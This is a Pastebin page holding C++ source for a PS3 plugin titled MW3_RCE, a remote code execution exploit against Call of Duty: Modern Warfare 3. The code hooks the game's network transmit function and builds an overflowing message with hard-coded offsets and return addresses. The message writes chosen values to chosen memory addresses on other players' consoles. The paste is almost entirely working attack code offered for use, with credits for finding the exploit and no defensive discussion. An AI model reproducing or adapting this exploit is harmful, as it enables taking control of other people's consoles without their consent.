Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <cellstatus.h>
- #include <sys/prx.h>
- #include <time.h>
- #include <fastmath.h>
- #include <ppu_intrinsics.h>
- #include <stdarg.h>
- #include <stddef.h>
- #include <sys/prx.h>
- #include <sys/syscall.h>
- #include <sys/ppu_thread.h>
- #include <sys/sys_time.h>
- #include <sys/time_util.h>
- #include <sys/timer.h>
- #include <sys/types.h>
- #include <sys/socket.h>
- #include <netinet\in.h>
- #include <arpa\inet.h>
- #include <netdb.h>
- #include <cell\pad\libpad.h>
- #include <sys/process.h>
- #include <sys/memory.h>
- SYS_MODULE_INFO( MW3_RCE, 0, 1, 1);
- SYS_MODULE_START( _MW3_RCE_prx_entry );
- SYS_MODULE_STOP(_MW3_RCE_prx_stop);
- /*
- Credits:
- Gamer7112 for bring my attention to this
- momo5502 for originally making a post showing this off.
- Sabotage finding the exploit and creating the poc
- */
- int RestoreHook[4];
- extern "C" {
- void *_sys_memset(void * ptr, void* value, size_t num);
- }
- #define memset _sys_memset
- struct msg_t
- {
- int overflowed;
- int readOnly;
- char* data;
- char* splitData;
- int maxsize;
- int cursize;
- int splitSize;
- int readcount;
- int bit;
- int lastEntityRef;
- int targetLocalNetID;
- int useZlib;
- };
- #define TOC 0x72DCE8
- struct opd_s_o
- {
- unsigned int sub;
- unsigned int toc;
- };
- opd_s_o MSG_WriteBitsCompress_t = { 0x001FBFC8, TOC };
- int(*MSG_WriteBitsCompress)(bool trainHuffman, const char *from, char *to, int size) = (int(*)(bool trainHuffman, const char *from, char *to, int size))&MSG_WriteBitsCompress_t;
- opd_s_o MSG_Init_t = { 0x001FBC78, TOC };
- int(*MSG_Init)(msg_t* msg, char* buffer, int size) = (int(*)(msg_t* msg, char* buffer, int size))&MSG_Init_t;
- opd_s_o MSG_WriteData_t = { 0x001FC128, TOC };
- int(*MSG_WriteData)(msg_t* msg, unsigned char* data, int size) = (int(*)(msg_t* msg, unsigned char* data, int size))&MSG_WriteData_t;
- int CL_Netchan_TransmitStub(...)
- {
- __asm("li %r3, 0x332;");
- }
- int CL_Netchan_Transmit(int netchan, unsigned char* buffer, int size, int unk)
- {
- if (*(int*)0x10055000 == 2)
- {
- msg_t message;
- memset(&message, 0, sizeof(msg_t));
- char MessageBuffer[0x1000];
- char DataToBeSent[0x1000];
- memset(MessageBuffer, 0, 0x1000);
- memset(DataToBeSent, 0, 0x1000);
- MSG_Init(&message, MessageBuffer, 0x1000);
- MSG_WriteData(&message, buffer, 0x9);
- memset(DataToBeSent, 0, 0x840 + 0x9C);
- int* a = (int*)&DataToBeSent[0x808];
- a[1] = *(int*)(0x10055014); //value
- a[3] = *(int*)(0x10055010); //address
- int* r = (int*)&DataToBeSent[0x820];
- r[3] = 0xCAD8C;
- r[35] = 0x1F6E58;
- r[36] = 0xAAAAAAAA;
- MSG_WriteData(&message, (unsigned char*)DataToBeSent, 0x840 + 0x9C);
- int CompressedSize = MSG_WriteBitsCompress(0, &message.data[0x9], &message.data[0x9], message.cursize - 0x9);
- *(int*)0x10055000 = 0;
- return CL_Netchan_TransmitStub(netchan, (unsigned char*)message.data, CompressedSize, unk);
- }
- return CL_Netchan_TransmitStub(netchan, buffer, size, unk);
- }
- int sys_dbg_read_process_memory(uint64_t address, void* data, size_t size) {
- system_call_4(904, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
- return_to_user_prog(int);
- }
- int sys_dbg_write_process_memory(uint64_t address, void* data, size_t size) {
- system_call_4(905, (uint64_t)sys_process_getpid(), address, size, (uint64_t)data);
- __dcbst((void*)address);
- __sync();
- __isync();
- return_to_user_prog(int32_t);
- }
- void DetourFunction(int address, void(*hookFunc), void(*stubFunc)) {
- int StubData[8], FuncData[4];
- int hook_address = hookFunc != NULL ? *(int*)hookFunc : 0;
- int stub_address = stubFunc != NULL ? *(int*)stubFunc : 0;
- if (stub_address) {
- int branchAddr = address + 0x10;
- StubData[0] = 0x3D600000 + ((branchAddr >> 16) & 0xFFFF) + (branchAddr & 0x8000 ? 1 : 0);
- StubData[1] = 0x396B0000 + (branchAddr & 0xFFFF);
- StubData[2] = 0x7D6903A6;
- StubData[7] = 0x4E800420;
- sys_dbg_read_process_memory(address, &StubData[3], 0x10);
- sys_dbg_write_process_memory(stub_address, StubData, 0x20);
- }
- if (hook_address) {
- FuncData[0] = 0x3D600000 + ((hook_address >> 16) & 0xFFFF) + (hook_address & 0x8000 ? 1 : 0);
- FuncData[1] = 0x396B0000 + (hook_address & 0xFFFF);
- FuncData[2] = 0x7D6903A6;
- FuncData[3] = 0x4E800420;
- sys_dbg_write_process_memory(address, FuncData, 0x10);
- }
- }
- extern "C" int _MW3_RCE_prx_entry(void)
- {
- sys_dbg_write_process_memory((uint64_t)RestoreHook, (void*)0xDE810, 0x10);
- DetourFunction(0xDE810, CL_Netchan_Transmit, CL_Netchan_TransmitStub);
- return SYS_PRX_RESIDENT;
- }
- extern "C" int _MW3_RCE_prx_stop(void)
- {
- sys_dbg_write_process_memory((uint64_t)0xDE810, (void*)RestoreHook, 0x10);
- return SYS_PRX_RESIDENT;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement